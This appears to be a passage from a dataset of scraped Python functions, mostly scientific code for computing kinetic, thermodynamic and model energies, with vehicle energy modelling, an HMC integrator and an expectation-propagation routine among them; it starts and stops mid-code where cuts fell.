discharge efficiency\"],\n fuel_cell_system_efficiency=self[\"fuel cell system efficiency\"],\n )\n\n self.energy = self.energy.assign_coords(\n {\n \"powertrain\": self.array.powertrain,\n \"year\": self.array.year,\n \"size\": self.array.coords[\"size\"],\n \"value\": self.array.coords[\"value\"],\n }\n )\n\n if self.energy_consumption:\n self.override_ttw_energy()\n\n distance = self.energy.sel(parameter=\"velocity\").sum(dim=\"second\") / 1000\n\n self[\"engine efficiency\"] = (\n np.ma.array(\n self.energy.loc[dict(parameter=\"engine efficiency\")],\n mask=self.energy.loc[dict(parameter=\"power load\")] == 0,\n )\n .mean(axis=0)\n .T\n )\n\n _o = lambda x: np.where((x == 0) | (x == np.nan), 1, x)\n\n if self.engine_efficiency is not None:\n print(\"Engine efficiency is being overridden.\")\n for key, val in self.engine_efficiency.items():\n pwt, size, year = key\n if (\n (val is not None)\n & (pwt in self.array.powertrain.values)\n & (year in self.array.year.values)\n & (size in self.array[\"size\"].values)\n ):\n self.array.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"engine efficiency\",\n )\n ] = float(val)\n\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"engine efficiency\",\n )\n ] = float(val) * np.where(\n self.energy.loc[\n dict(\n parameter=\"power load\",\n powertrain=pwt,\n size=size,\n year=year,\n )\n ]\n == 0,\n 0,\n 1,\n )\n\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"motive energy\",\n )\n ] = self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"motive energy at wheels\",\n )\n ] / (\n _o(\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"engine efficiency\",\n )\n ]\n )\n * _o(\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"transmission efficiency\",\n )\n ]\n )\n )\n\n self[\"transmission efficiency\"] = (\n np.ma.array(\n 
self.energy.loc[dict(parameter=\"transmission efficiency\")],\n mask=self.energy.loc[dict(parameter=\"power load\")] == 0,\n )\n .mean(axis=0)\n .T\n )\n\n if self.transmission_efficiency is not None:\n print(\"Transmission efficiency is being overridden.\")\n for key, val in self.transmission_efficiency.items():\n pwt, size, year = key\n\n if (\n (val is not None)\n & (pwt in self.array.powertrain.values)\n & (year in self.array.year.values)\n & (size in self.array[\"size\"].values)\n ):\n self.array.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"transmission efficiency\",\n )\n ] = float(val)\n\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"transmission efficiency\",\n )\n ] = float(val) * np.where(\n self.energy.loc[\n dict(\n parameter=\"power load\",\n powertrain=pwt,\n size=size,\n year=year,\n )\n ]\n == 0,\n 0,\n 1,\n )\n\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"motive energy\",\n )\n ] = self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"motive energy at wheels\",\n )\n ] / (\n _o(\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"engine efficiency\",\n )\n ]\n )\n * _o(\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"transmission efficiency\",\n )\n ]\n )\n )\n\n self[\"TtW energy\"] = (\n self.energy.sel(\n parameter=[\"motive energy\", \"auxiliary energy\", \"recuperated energy\"]\n ).sum(dim=[\"second\", \"parameter\"])\n / distance\n ).T\n\n self[\"TtW energy, combustion mode\"] = self[\"TtW energy\"] * (\n self[\"combustion power share\"] > 0\n )\n self[\"TtW energy, electric mode\"] = self[\"TtW energy\"] * (\n self[\"combustion power share\"] == 0\n )\n\n self[\"auxiliary energy\"] = (\n self.energy.sel(parameter=\"auxiliary energy\").sum(dim=\"second\") / distance\n ).T", "def verhulst(nb_init, t0, tf, eps, methode, gamma, K) :\n f=lambda y,t : gamma*y*(1-y/K)\n Y=meth_epsilon(nb_init, t0, tf, eps, f, methode)\n return Y", "def get_data_term(self):\n \n if self.num_hidden == 0:\n \n data_term = -self.compute_energy(self.x, self.batch_size)\n \n else:\n \n data_term = -self.compute_free_energy(self.x)\n \n return T.sum(T.exp(-data_term))", "def kinetic_energy(self):\r\n position, velocity, escaped_particles,impact, wall_collision,mom = self.box_collision_info()\r\n for j in xrange(1,self.n):\r\n abs_velocity = np.sqrt(velocity[:,0]**2+velocity[:,1]**2\r\n + velocity[:,2]**2)\r\n KE = 0.5*self.m*abs_velocity**2\r\n total_KE = np.sum(KE)\r\n invid_KE = total_KE/self.Npart\r\n\r\n return total_KE, invid_KE", "def kinetic_energy(self, units = 'si'):\n if units == 'si':\n return 0.5 * self.mass * (linalg.norm(self.velocity) ** 2)\n if units == 'au':\n return 0.5 * self.mass * (linalg.norm(self.velocity * (1.496e11) * 86400) ** 2)", "def total_energy(state, k=1, m=1):\n return 0.5*k*state[..., 0]*state[..., 0]+0.5*m*state[..., 1]*state[..., 1]", "def Kg(T, D):\n# return 2.10*np.ones(np.shape(T)) #at 0 degC\n# return Kg0*np.exp(Kg1*T)\n KiT=Kg0*np.exp(Kg1*T)\n return (2.*KiT*D)/(3.-D)", "def KineticEnergy(self):\n return Particle.TotalEnergy(self) - Particle.RestEnergy(self)", "def kinetic_energies(self):\n return sum([body.kinetic_energy\n for body in self.bodies])", "def kinetic_energy(traj, tend=80):\n # Resample trajectory at regular intervals\n dt = 0.2\n dxdt = traj.sample(tlo=5, thi=tend, dt=dt, precise=True)['y']\n # Use simple Riemann sum to estimate kinetic energy 
cost\n KE = sum(dxdt**2)*dt\n return KE", "def internalenergy(temp,pres):\n g = liq_g(0,0,temp,pres)\n g_t = liq_g(1,0,temp,pres)\n g_p = liq_g(0,1,temp,pres)\n u = g - temp*g_t - pres*g_p\n return u", "def kinetic_energy(self, KE):\n # Creating an axis for the time steps\n x = np.linspace(0, self.t, self.N*self.t+1)\n # Initializing the figure\n plt.figure(figsize=(10, 10))\n # Creating the plot\n plt.plot(x, KE)\n # Decorating the plot\n plt.suptitle('Total kinetic energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['KE'])", "def calc_k(self):\n\t\n\tself.k = -np.array([self.sth*self.cphi, self.sth*self.sphi, self.cth])\n\n\treturn", "def compute_energy_density(kT):\n h=u.planck\n c=u.speed_of_light\n pi=np.pi\n return (8*pi/(h*c)**3)*((pi*kT)**4/15)", "def e_kinetic(self, q = np.zeros(2) , dq = np.zeros(2) , R_index = 0 ): \n \n Ha = self.H_all( q , R_index ) \n \n e_k = 0.5 * np.dot( dq , np.dot( Ha , dq ) )\n \n return e_k", "def e_kinetic(self, q = np.zeros(2) , dq = np.zeros(2) , R_index = 0 ): \n \n Ha = self.H_all( q , R_index ) \n \n e_k = 0.5 * np.dot( dq , np.dot( Ha , dq ) )\n \n return e_k", "def KPMO(XVal,YVal_State_1,YVal_State_2,YVal_State_3,XVal_Mean_Trans_1,XVal_Mean_Trans_2,XVal_Sig_Trans_1,XVal_Sig_Trans_2,iOpt):\n#\t1. Computations:\n\tTiny=1E-20\n\tP_Trans_1 = fCPD(XVal,XVal_Mean_Trans_1, XVal_Sig_Trans_1) # Transition of kerogen from State #1 to State #2\n\tP_Trans_2 = fCPD(XVal,XVal_Mean_Trans_2, XVal_Sig_Trans_2) # Transition of kerogen from State #2 to State #3\n\tFunVal=0\n\tif(iOpt==0):\n\t\tP_State_1=(1-P_Trans_1)*(1-P_Trans_2)\n\t\tP_State_2=P_Trans_1*(1 - P_Trans_2)\n\t\tP_State_3=1-P_State_1-P_State_2\n\t\tFunVal=(YVal_State_1*P_State_1)+(YVal_State_2*P_State_2)+(YVal_State_3*P_State_3)\n\tif(iOpt==1):\n\t\tFunVal=YVal_State_1+P_Trans_1*YVal_State_2+P_Trans_2*YVal_State_3\n\tif(FunVal==0):\n\t\tFunVal=Tiny\n\treturn FunVal", "def kinetic_energy(v, Mm=1.):\n speed_squared = v[:, 0] ** 2 + v[:, 1] ** 2\n # timeit.timeit('vt[:,0]**2+vt[:,1]**2', setup='import numpy as np; vt = np.random.rand(10000,2)', number=1000)\n KE = 0.5 * sum(Mm * speed_squared)\n return KE", "def energy_func(self):\n i = self.inl[0].to_flow()\n o = self.outl[0].to_flow()\n\n T_m = (T_mix_ph(i, T0=self.inl[0].T.val_SI) +\n T_mix_ph(o, T0=self.outl[0].T.val_SI)) / 2\n\n return (i[0] * (o[2] - i[2]) -\n self.A.val * (\n self.E.val * self.eta_opt.val -\n (T_m - self.Tamb.val_SI) * self.lkf_lin.val -\n self.lkf_quad.val * (T_m - self.Tamb.val_SI) ** 2))", "def uncertainty_ee(self,e1,e2):\n # reco\n unc = (self._eleRecoWeight[(e1.pt(),e1.eta())][1]/self._eleRecoWeight[(e1.pt(),e1.eta())][0] + \\\n self._eleRecoWeight[(e2.pt(),e2.eta())][1]/self._eleRecoWeight[(e2.pt(),e2.eta())][0])**2\n # id-isolation\n unc += (self._eleIdIsoWeight[(e1.pt(),e1.eta())][1]/self._eleIdIsoWeight[(e1.pt(),e1.eta())][0] + \\\n self._eleIdIsoWeight[(e2.pt(),e2.eta())][1]/self._eleIdIsoWeight[(e2.pt(),e2.eta())][0])**2\n # trigger (approximate)\n unc += (abs(self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][1]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][1]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][1]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][1])/ \\\n (self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n 
self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]))**2\n unc += ((self._ele8TrgWeight[(e1.pt(),e1.eta())][1]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][1])/ \\\n (self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]))**2\n #outcome\n return sqrt(unc)", "def compute_energy(self):\n energy = 0.5 * self.masses * np.sum(self.velocities * self.velocities, axis=1)\n avg_energy = np.mean(energy) # average kinetic energy of all particles\n return avg_energy", "def self_energy(gf_imp0, gf_imp):\n return 1/gf_imp0 - 1/gf_imp", "def kinetic_energy(vel):\r\n return 0.5 * (vel ** 2).sum(axis=1)", "def kin_energy (self):\n\n for planet in self.planets:\n planet.kenergy = 0.5*planet.mass*((np.linalg.norm(planet.velocity))**2) # every 'kenergy' depends by the body's mass and velocity", "def energy_func(self):\n i = self.inl[0].to_flow()\n o = self.outl[0].to_flow()\n\n T_m = (T_mix_ph(i, T0=self.inl[0].T.val_SI) +\n T_mix_ph(o, T0=self.outl[0].T.val_SI)) / 2\n\n iam = (\n 1 - self.iam_1.val * abs(self.aoi.val) -\n self.iam_2.val * self.aoi.val ** 2)\n\n return (i[0] * (o[2] - i[2]) -\n self.A.val * (\n self.E.val * self.eta_opt.val * self.doc.val ** 1.5 * iam -\n (T_m - self.Tamb.val_SI) * self.c_1.val -\n self.c_2.val * (T_m - self.Tamb.val_SI) ** 2))", "def _energy(self, X, y):\n yhat = self.evaluate(X)\n loss = ((y - yhat) ** 2).sum() / 2\n return loss", "def energy(e: float) -> float:\n\n return (1/np.sqrt(2))*(gamma(-e/2+1/2)/(gamma(-e/2+3/4)))", "def get_energy(self):\r\n return self._energy", "def useKineticEnergy(self):\n return self.params['useKinetic']", "def __init__(self, temperature=298.0 * simtk.unit.kelvin, nsteps=10, timestep=1 * simtk.unit.femtoseconds):\n\n super(HMCIntegrator, self).__init__(timestep)\n\n # Compute the thermal energy.\n kT = kB * temperature\n\n #\n # Integrator initialization.\n #\n self.addGlobalVariable(\"naccept\", 0) # number accepted\n self.addGlobalVariable(\"ntrials\", 0) # number of Metropolization trials\n\n self.addGlobalVariable(\"kT\", kT) # thermal energy\n self.addPerDofVariable(\"sigma\", 0)\n self.addGlobalVariable(\"ke\", 0) # kinetic energy\n self.addPerDofVariable(\"xold\", 0) # old positions\n self.addGlobalVariable(\"Eold\", 0) # old energy\n self.addGlobalVariable(\"Enew\", 0) # new energy\n self.addGlobalVariable(\"accept\", 0) # accept or reject\n self.addPerDofVariable(\"x1\", 0) # for constraints\n\n #\n # Pre-computation.\n # This only needs to be done once, but it needs to be done for each degree of freedom.\n # Could move this to initialization?\n #\n self.addComputePerDof(\"sigma\", \"sqrt(kT/m)\")\n\n #\n # Allow Context updating here, outside of inner loop only.\n #\n self.addUpdateContextState()\n\n #\n # Draw new velocity.\n #\n self.addComputePerDof(\"v\", \"sigma*gaussian\")\n self.addConstrainVelocities()\n\n #\n # Store old position and energy.\n #\n self.addComputeSum(\"ke\", \"0.5*m*v*v\")\n self.addComputeGlobal(\"Eold\", \"ke + energy\")\n self.addComputePerDof(\"xold\", \"x\")\n\n #\n # Inner symplectic steps using velocity Verlet.\n #\n for step in range(nsteps):\n 
self.addComputePerDof(\"v\", \"v+0.5*dt*f/m\")\n self.addComputePerDof(\"x\", \"x+dt*v\")\n self.addComputePerDof(\"x1\", \"x\")\n self.addConstrainPositions()\n self.addComputePerDof(\"v\", \"v+0.5*dt*f/m+(x-x1)/dt\")\n self.addConstrainVelocities()\n\n #\n # Accept/reject step.\n #\n self.addComputeSum(\"ke\", \"0.5*m*v*v\")\n self.addComputeGlobal(\"Enew\", \"ke + energy\")\n self.addComputeGlobal(\"accept\", \"step(exp(-(Enew-Eold)/kT) - uniform)\")\n self.addComputePerDof(\"x\", \"x*accept + xold*(1-accept)\")\n\n #\n # Accumulate statistics.\n #\n self.addComputeGlobal(\"naccept\", \"naccept + accept\")\n self.addComputeGlobal(\"ntrials\", \"ntrials + 1\")", "def _calculate_measurement_error(self): \n \n # Calculate Hartmann Spot\n # FIXME what are factor_1, factor_2 ???\n factor_1, factor_2 = 206265*5.89e-7, 206265*6.5e-7\n term1, term2 = factor_1/self.actuator_spacing, factor_2/self.r0\n hartmann_spot = np.max([term1, term2])\n \n # Calculate SNR \n n_pix=4 # FIXME spreadsheet says not to change this idk why?\n sample_time = 1/(10*self.controller_frequency)\n brightness = (8.9e5)*10**((0-self.guide_star_mag)/2.5)\n n_photons = brightness*sample_time*((100*self.actuator_spacing)**2)\n snr = n_photons/np.sqrt(n_photons + n_pix*(self.sigma_readnoise)**2)\n\n # Calculate noise propagator \n degrees_of_freedom = np.round((np.pi/4) * (self.telescope_diameter/self.actuator_spacing)**2)\n factor_1, factor_2 = 0.0536, 0.0795 # FIXME WHAT THE HECK IS THIS\n if self.aperture == 'circular':\n factor_1, factor_2 = 0.0068, 0.0796\n noise_propagator = np.sqrt(2*(factor_1 + factor_2*np.log(degrees_of_freedom)))\n\n # Calculate close loop averaging\n controller_over_frame = 1/10\n close_loop_averaging = np.sqrt(2*controller_over_frame)*np.arctan(1/(2*controller_over_frame))\n sigma_measurement = noise_propagator * close_loop_averaging * (self.actuator_spacing*1e9) * (hartmann_spot/snr*4.84814e-6)\n self.sigma_measurement = sigma_measurement # in nm", "def get_energy(self):\n return self.momentum*self.momentum/(2*self.mass)", "def calc_gravitational_energy(self):\n\n star = self.star\n\n M, K, N = star.mesh_size\n ph = star.phi_coords\n mu = star.mu_coords\n r = star.r_coords\n\n def S1(j, k):\n sum = 0\n\n for i in range(0, M - 2, 2):\n sum += (1 / 6) * (ph[i + 2] - ph[i]) * (star.rho[i, j, k] * star.Phi[i, j, k] + 4 *\n star.rho[i + 1, j, k] * star.Phi[i + 1, j, k] +\n star.rho[i + 2, j, k] * star.Phi[i + 2, j, k])\n return 2 * sum\n\n def S2(k):\n sum = 0\n\n for j in range(0, K - 2, 2):\n sum += (1 / 6) * (mu[j + 2] - mu[j]) * \\\n (S1(j, k) + 4 * S1(j + 1, k) + S1(j + 2, k))\n\n return 2 * sum\n\n W = 0\n\n for k in range(0, N - 2, 2):\n W -= 0.5 * (1 / 6) * (r[k + 2] - r[k]) * (r[k]**2 * S2(k) +\n 4 * r[k + 1]**2 * S2(k + 1) +\n r[k + 2]**2 * S2(k + 2))\n\n return W", "def malthusiens(nb_init, t0, tf, eps, methode, gamma ) :\n\n f=lambda y, t : gamma*y\n Y=meth_epsilon(nb_init, t0, tf, eps, f, methode)\n return Y", "def calculate_energy(self):\n temp_e = 0\n\n for i in range(0,self.neuron_count):\n for j in range(0, self.neuron_count):\n if i != j:\n temp_e += self.get_weight(i, j) * self.current_state[i] * \\\n self.current_state[j]\n return -1 * temp_e / 2", "def helmholtzenergy(temp,pres):\n g = liq_g(0,0,temp,pres)\n g_p = liq_g(0,1,temp,pres)\n f = g - pres*g_p\n return f", "def kinetic_energy_rigidbody(theta, phi, vX, vY, vtheta, vphi, vpsi, Mm, params):\n l = params['l']\n I3 = params['I3']\n I1star = params['I1'] + Mm * l ** 2\n\n # gw3 = vpsi + vphi* np.cos(theta)\n w3 = 
params['w3']\n\n v_sq = vX ** 2 + vY ** 2\n vXprod = vX * (vtheta * np.cos(theta) * np.cos(phi) - vphi * np.sin(theta) * np.sin(phi))\n vYprod = vY * (vtheta * np.cos(theta) * np.sin(phi) + vphi * np.sin(theta) * np.cos(phi))\n T1 = 0.5 * Mm * (v_sq)\n T2 = Mm * l * (vXprod + vYprod)\n T3 = 0.5 * I1star * (vphi ** 2 * np.sin(theta) ** 2 + vtheta ** 2)\n T4 = 0.5 * I3 * w3 ** 2\n\n KEvec = T1 + T2 + T3 + T4\n KE = sum(KEvec)\n if 'BIND' in params:\n if len(params['BIND']) > 0:\n KEnonboundary = KE - sum(KEvec[params['BIND']])\n else:\n KEnonboundary = 0 * KE\n else:\n KEnonboundary = 0 * KE\n\n return KE, KEvec, KEnonboundary, sum(T1), sum(T2), sum(T3), sum(T4)", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def energy(ps):\n return kinetic_energy(ps) + potential_energy(ps)", "def method_2(kdep=0.002, krand=8e-6, Mn0=70000):\n a = np.exp((kdep * t * (1 / Mn0 + krand * c_water / 1e-5)) / (-2.3))\n return a", "def total_kin_energy (self):\n total = 0. \n for planet in self.planets: #this loop takes each planet's kinetic energy and sums it with the others.\n total += planet.kenergy # the sum of the kinetic energies\n total_kin= total # system's kinetic energy\n \n return(total_kin)", "def kinetic_energy(ps):\n return sum([p.kinetic_energy() for p in ps])", "def get_evaporation_latent_heat() -> float:\n theta = 28.0\n return 2500.8 - 2.3668 * theta", "def kge(sim, obs, dim=\"time\"):\n cc = pearson_correlation(sim, obs, dim=dim)\n cc.name = \"kge_pearson_coef\"\n alpha = sim.std(dim=dim) / obs.std(dim=dim)\n alpha.name = \"kge_rel_var\"\n beta = sim.sum(dim=dim) / obs.sum(dim=dim)\n beta.name = \"kge_bias\"\n kge = 1 - np.sqrt((cc - 1) ** 2 + (alpha - 1) ** 2 + (beta - 1) ** 2)\n kge.name = \"kge\"\n ds_out = xr.merge([kge, cc, alpha, beta])\n return ds_out", "def energies():\n # Hardcoded initial values\n numsteps = 10000\n time_max = 1\n # Running the calculation in the solver class using the velocity verlet method\n # for better accuracy.\n verlet = solver(input_matrix, 'verlet', time_max, numsteps)\n output_matrix, KE, PE, AM = verlet.main()\n # Creating a simple time axis for plotting\n x = np.linspace(0, 1, numsteps+1)\n\n # Plotting kinetic energy over time\n plt.figure(1, figsize=(10, 10))\n plt.plot(x, KE)\n plt.suptitle('Total kinetic energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['KE'])\n\n # Plotting potential energy over time\n plt.figure(2, figsize=(10, 10))\n plt.plot(x, PE)\n plt.suptitle('Total potential energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['PE'])\n\n # Plotting total energy against time\n plt.figure(3, figsize=(10, 10))\n plt.plot(x, PE+KE)\n plt.suptitle('Total energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['KE+PE'])\n\n # Plotting angular momentum against time. 
print the amplitude to terminal\n amplitude = max(AM)-min(AM)\n print('Amplitude of angular momentum during 1 year: %g[AU²/yr²]' %(amplitude))\n plt.figure(4, figsize=(10, 10))\n plt.plot(x, AM)\n plt.suptitle('Total angular momentum in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²/yr²]', fontsize=16)\n plt.legend(['AM'])\n\n # Plotting the kinetic, potential and total energy against time to see\n # how great the variations are\n plt.figure(5, figsize=(10, 10))\n plt.plot(x, PE, x, KE, x, KE+PE)\n plt.suptitle('Total energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['PE', 'KE', 'KE+PE'])\n plt.show()", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def calculate(self, model_name, number_of_points, bandwidth,dis_param, c,k, seed, phi=0):\n if model_name != \"Anderson\":\n raise Error(\"NotImpelmented\")\n prng = np.random.RandomState((None if seed == 0 else seed))\n \n m = models.Model_Anderson_DD_1d(number_of_points=number_of_points,\n bandwidth=bandwidth, dis_param=dis_param, periodic=False, prng = prng)\n prng = np.random.RandomState((None if seed == 0 else seed))\n \n m1 = models.Model_Anderson_DD_1d(number_of_points=number_of_points,\n bandwidth=bandwidth, dis_param=dis_param, periodic=True, prng = prng, phi=0)\n prng = np.random.RandomState((None if seed == 0 else seed))\n \n m2 = models.Model_Anderson_DD_1d(number_of_points=number_of_points,\n bandwidth=bandwidth, dis_param=dis_param, periodic=True, prng = prng, phi=phi)\n \n g = abs(phys_functions.A_matrix_inv(m.rate_matrix, c, k))**2\n psi_1, psi_N = (m1.eig_matrix[0,:]), (m1.eig_matrix[-1,:])\n thouless, prec = phys_functions.pure_thouless_g(m1.eig_vals, m2.eig_vals, phi)\n heat_g = phys_functions.heat_g(psi_1, 
psi_N)\n psi1psiN = np.nansum(abs(psi_1*psi_N))\n ############# UGLY HACK : Append zeros to fit sizes\n vals_with_N_size = [('psi_1', psi_1),\n ('psi_N', psi_N),('thouless_g', abs(thouless))]\n if self._N == number_of_points :\n appended = vals_with_N_size\n else:\n myzeros = np.zeros(self._N - number_of_points)\n \n appended = [(key, np.append(val,myzeros)) for key,val in vals_with_N_size]\n \n print (prec*number_of_points, np.nansum(thouless))\n return dict([('g', g), ('psi1psiN',psi1psiN), \n ('thouless_sum', abs(np.nansum(abs(thouless)))), ('phi',phi),('heat_g', heat_g)] +appended)", "def getEnergy(self):\n energy = 0.0\n\n for i in range(0, self.nPoints):\n energy += self.tDomain[i] ** 2\n\n energy /= self.nPoints\n return energy", "def computeEnergy(self):\n\t\tGmo = self.Gmo\n\t\te = self.e\n\t\tself.Ec = 0.0\n\n\t\tfor i in range( self.nocc ):\n\t\t\tfor j in range( self.nocc ):\n\t\t\t\tfor a in range( self.nocc,self.norb ):\n\t\t\t\t\tfor b in range( self.nocc,self.norb ):\n\t\t\t\t\t\tself.Ec += 0.25*(Gmo[i,j,a,b]*Gmo[a,b,i,j])/(e[i]+e[j]-e[a]-e[b])\n\n\t\treturn self.E0 + self.Ec", "def fit_DTC(self, Kmm, Kmn, epsilon=1e-3,power_ep=[1.,1.]):\r\n self.epsilon = epsilon\r\n self.eta, self.delta = power_ep\r\n\r\n num_inducing = Kmm.shape[0]\r\n\r\n #TODO: this doesn't work with uncertain inputs!\r\n\r\n \"\"\"\r\n Prior approximation parameters:\r\n q(f|X) = int_{df}{N(f|KfuKuu_invu,diag(Kff-Qff)*N(u|0,Kuu)} = N(f|0,Sigma0)\r\n Sigma0 = Qnn = Knm*Kmmi*Kmn\r\n \"\"\"\r\n KmnKnm = np.dot(Kmn,Kmn.T)\r\n Lm = jitchol(Kmm)\r\n Lmi = chol_inv(Lm)\r\n Kmmi = np.dot(Lmi.T,Lmi)\r\n KmmiKmn = np.dot(Kmmi,Kmn)\r\n Qnn_diag = np.sum(Kmn*KmmiKmn,-2)\r\n LLT0 = Kmm.copy()\r\n\r\n #Kmmi, Lm, Lmi, Kmm_logdet = pdinv(Kmm)\r\n #KmnKnm = np.dot(Kmn, Kmn.T)\r\n #KmmiKmn = np.dot(Kmmi,Kmn)\r\n #Qnn_diag = np.sum(Kmn*KmmiKmn,-2)\r\n #LLT0 = Kmm.copy()\r\n\r\n \"\"\"\r\n Posterior approximation: q(f|y) = N(f| mu, Sigma)\r\n Sigma = Diag + P*R.T*R*P.T + K\r\n mu = w + P*Gamma\r\n \"\"\"\r\n mu = np.zeros(self.num_data)\r\n LLT = Kmm.copy()\r\n Sigma_diag = Qnn_diag.copy()\r\n\r\n \"\"\"\r\n Initial values - Cavity distribution parameters:\r\n q_(g|mu_,sigma2_) = Product{q_i(g|mu_i,sigma2_i)}\r\n sigma_ = 1./tau_\r\n mu_ = v_/tau_\r\n \"\"\"\r\n self.tau_ = np.empty(self.num_data,dtype=float)\r\n self.v_ = np.empty(self.num_data,dtype=float)\r\n\r\n #Initial values - Marginal moments\r\n z = np.empty(self.num_data,dtype=float)\r\n self.Z_hat = np.empty(self.num_data,dtype=float)\r\n phi = np.empty(self.num_data,dtype=float)\r\n mu_hat = np.empty(self.num_data,dtype=float)\r\n sigma2_hat = np.empty(self.num_data,dtype=float)\r\n\r\n #Approximation\r\n epsilon_np1 = 1\r\n epsilon_np2 = 1\r\n \tself.iterations = 0\r\n np1 = [self.tau_tilde.copy()]\r\n np2 = [self.v_tilde.copy()]\r\n while epsilon_np1 > self.epsilon or epsilon_np2 > self.epsilon:\r\n update_order = np.random.permutation(self.num_data)\r\n for i in update_order:\r\n #Cavity distribution parameters\r\n self.tau_[i] = 1./Sigma_diag[i] - self.eta*self.tau_tilde[i]\r\n self.v_[i] = mu[i]/Sigma_diag[i] - self.eta*self.v_tilde[i]\r\n #Marginal moments\r\n self.Z_hat[i], mu_hat[i], sigma2_hat[i] = self.noise_model.moments_match(self.data[i],self.tau_[i],self.v_[i])\r\n #Site parameters update\r\n Delta_tau = self.delta/self.eta*(1./sigma2_hat[i] - 1./Sigma_diag[i])\r\n Delta_v = self.delta/self.eta*(mu_hat[i]/sigma2_hat[i] - mu[i]/Sigma_diag[i])\r\n self.tau_tilde[i] += Delta_tau\r\n self.v_tilde[i] += Delta_v\r\n #Posterior distribution parameters 
